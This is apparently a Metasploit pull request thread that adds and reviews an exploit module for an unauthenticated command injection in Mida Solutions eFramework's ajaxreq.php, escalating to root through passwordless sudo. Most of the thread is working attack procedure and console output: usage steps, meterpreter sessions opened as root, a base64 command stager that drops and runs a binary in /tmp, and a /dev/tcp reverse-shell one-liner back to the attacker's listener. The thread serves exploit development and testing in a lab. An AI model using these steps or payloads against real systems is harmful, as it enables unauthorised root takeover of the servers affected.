Add Mida Solutions eFramework ajaxreq.php Command Injection

[bcoles]

Vulnerable Application

This module exploits a command injection vulnerability in
Mida Solutions eFramework
version 2.9.0 and prior.

The ajaxreq.php file allows unauthenticated users to inject
arbitrary commands in the PARAM parameter to be executed as
the apache user. The sudo configuration permits the apache user
to execute any command as root without providing a password,
resulting in privileged command execution as root.

This module has been successfully tested on Mida Solutions
eFramework-C7-2.9.0 virtual appliance.

Download:

http://ova-efw.midasolutions.com/

Verification Steps

1. Start msfconsole
2. Do: use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce
3. Do: set RHOSTS [IP]
4. Do: set payload [payload]
5. Do: set LHOST [IP]
6. Do: exploit

Options

TARGETURI

Base path to eFramework (Default: /)

Scenarios

msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhosts 172.16.191.123
rhosts => 172.16.191.123
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > check
[+] 172.16.191.123:443 - The target is vulnerable.
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (3008420 bytes) to 172.16.191.123
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.123:42452) at 2020-08-30 08:42:27 -0400
[*] Command Stager progress - 100.00% done (897/897 bytes)

meterpreter > getuid
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.16.191.123
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[gwillcox-r7]

@bcoles Can you please update your PR description? A blank PR description isn't very helpful for understanding whats going on here, and we tend to close issues with blank PR descriptions.

Also for future reference, it would be helpful if you could include a link to where one can download the software. I managed to find a working link at https://www.dropbox.com/s/p3ivbhn3y4xvrpp/eFramework-C7-2.9.0.ova?dl=0 but I'm not sure if this is the official software or not.

[gwillcox-r7]

by using the sudo command without providing a password -> This would read better in my opinion and would reflect the fact that sudo is a command more appropriately within this paragraph.

[space-r7]

Hey @bcoles, that link is not working for me. Is there another method you went through to get this software? If a trial is sufficient, I can do that. Thanks!

[space-r7]

Code and docs lgtm.

Tested:

msf6 > use exploit/linux/http/mida_solutions_eframework_ajaxreq_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > options

Module options (exploit/linux/http/mida_solutions_eframework_ajaxreq_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to eFramework
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set rhost 192.168.37.132
rhost => 192.168.37.132
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set verbose true
verbose => true
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Command output: uid=0(root) gid=0(root) groups=0(root)

[+] The target is vulnerable.
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAALAEAAAAAAADgAQAAAAAAAAAQAAAAAAAA6ydbU1+wbPyudf1XWVNeigYwB0j/x0j/xmaBP0uhdAeAPmx16uvm/+Ho1P///wNsSzL8aQpbmrUTS4rVTjLKaSFCWbEEDAZLhsN7UmkJQlpTaSpbmmkBXGkCXQwGS4bDezhLlEu6AQMSX8OrJgJSS4rlaRNZaSlbDAZaS4bDeiZK/Mp3G1RpIFtpA2kGS4rkSzL1DAZaWlxLhsN6xGk/W2kCXAwGXWl9WQwGS4bDe+785Uuh>>'/tmp/GrRZy.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/HFFAn' < '/tmp/GrRZy.b64' ; chmod +x '/tmp/HFFAn' ; '/tmp/HFFAn' & sleep 2 ; rm -f '/tmp/HFFAn' ; rm -f '/tmp/GrRZy.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3008420 bytes) to 192.168.37.132
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.132:54650) at 2020-09-16 10:15:02 -0500
[*] Command Stager progress - 100.00% done (897/897 bytes)

meterpreter > getuid
Server username: root @ eFramework-1 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.37.132
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.10.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.37.132 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > set target 2
target => 2
msf6 exploit(linux/http/mida_solutions_eframework_ajaxreq_rce) > run

[+] 0<&63-;exec 63<>/dev/tcp/192.168.37.1/4444;sh <&63 >&63 2>&63
[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Command output: uid=0(root) gid=0(root) groups=0(root)

[+] The target is vulnerable.
[*] Command shell session 3 opened (192.168.37.1:4444 -> 192.168.37.132:55322) at 2020-09-16 10:19:10 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux eFramework-1 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

[space-r7]

Release Notes

New module exploits/linux/http/mida_solutions_eframework_ajaxreq_rce provides an exploit for Mida Solutions eFramework versions 2.9.0 and below, allowing unauthenticated shell commands to be executed as the apache user via the PARAM parameter in requests to ajaxreq.php. Because the sudo configuration allows the apache user to execute commands without requiring a password, this vector ultimately achieves code execution as the root user.